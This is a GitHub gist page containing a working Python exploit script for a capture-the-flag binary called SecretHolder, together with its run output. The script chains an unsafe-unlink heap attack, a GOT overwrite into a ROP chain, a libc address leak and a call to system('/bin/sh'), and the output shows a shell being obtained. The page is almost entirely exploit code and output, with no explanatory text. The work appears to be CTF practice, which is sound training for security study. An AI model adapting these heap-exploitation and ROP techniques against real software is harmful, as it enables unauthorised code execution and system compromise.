Create a gist now

Instantly share code, notes, and snippets.

@inaz2 /test.py
Last active Oct 13, 2016

What would you like to do?
$ python test.py
[+] unsafe unlink attack
[+] GOT overwrite to ROP
[+] leak libc address
[+] execute system('/bin/sh')
[+] got a shell!
id
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
$ /lib/x86_64-linux-gnu/libc.so.6
GNU C Library (Ubuntu GLIBC 2.23-0ubuntu3) stable release version 2.23, by Roland McGrath et al.
Copyright (C) 2016 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.
There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A
PARTICULAR PURPOSE.
Compiled by GNU CC version 5.3.1 20160413.
Available extensions:
crypt add-on version 2.1 by Michael Glad and others
GNU Libidn by Simon Josefsson
Native POSIX Threads Library by Ulrich Drepper et al
BIND-8.2.3-T5B
libc ABIs: UNIQUE IFUNC
For bug reporting instructions, please see:
<https://bugs.launchpad.net/ubuntu/+source/glibc/+bugs>.
from minipwn import *
def keep_secret(s, level, buf):
recvuntil(s, '3. Renew secret\n')
sendline(s, '1')
recvuntil(s, '3. Huge secret\n')
sendline(s, str(level))
recvuntil(s, 'Tell me your secret: \n')
s.sendall(buf or '\x00')
def wipe_secret(s, level):
recvuntil(s, '3. Renew secret\n')
sendline(s, '2')
recvuntil(s, '3. Huge secret\n')
sendline(s, str(level))
def renew_secret(s, level, buf):
recvuntil(s, '3. Renew secret\n')
sendline(s, '3')
recvuntil(s, '3. Huge secret\n')
sendline(s, str(level))
recvuntil(s, 'Tell me your secret: \n')
s.sendall(buf or '\x00')
s = connect_process(['./SecretHolder_d6c0bed6d695edc12a9e7733bedde182554442f8'])
#s = socket.create_connection(('localhost', 4444))
raw_input()
print "[+] unsafe unlink attack"
keep_secret(s, 3, '')
wipe_secret(s, 3)
keep_secret(s, 1, '')
wipe_secret(s, 1)
keep_secret(s, 3, '')
wipe_secret(s, 1)
addr_ptr_small = 0x6020B0
buf = '\x00' * 0x10
buf += p64(addr_ptr_small-0x18) + p64(addr_ptr_small-0x10)
buf += p64(0x20) + p64(0xfb0)
keep_secret(s, 1, '')
keep_secret(s, 2, '')
renew_secret(s, 3, buf)
wipe_secret(s, 2)
print "[+] GOT overwrite to ROP"
got_memset = 0x602030
got_stack_fail = 0x602028
addr_ret = 0x400691
addr_read_a_lot = 0x4009F9
buf = '\x00' * 8
buf += p64(got_memset)
buf += p64(0)
buf += p64(got_stack_fail)
buf += p32(1) * 3
renew_secret(s, 1, buf)
renew_secret(s, 1, p64(addr_ret))
renew_secret(s, 2, p64(addr_read_a_lot))
print "[+] leak libc address"
addr_pop_rdi = 0x400e03
got_libc_start = 0x602048
addr_plt_puts = 0x4006C0
addr_main = 0x400CC2
buf = '\x00' * 0x18
buf += p64(addr_pop_rdi)
buf += p64(got_libc_start)
buf += p64(addr_plt_puts)
buf += p64(addr_main)
recvuntil(s, '3. Renew secret\n')
s.sendall(buf)
data = s.recv(8192)
addr_libc_start = u64(data.ljust(8, '\x00'))
addr_libc_system = addr_libc_start - 0x20740 + 0x45380
addr_libc_sh = addr_libc_start - 0x20740 + 0x18c58b
print "[+] execute system('/bin/sh')"
buf = '\x00' * 0x18
buf += p64(addr_pop_rdi)
buf += p64(addr_libc_sh)
buf += p64(addr_libc_system)
recvuntil(s, '3. Renew secret\n')
s.sendall(buf)
print "[+] got a shell!"
interact(s)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment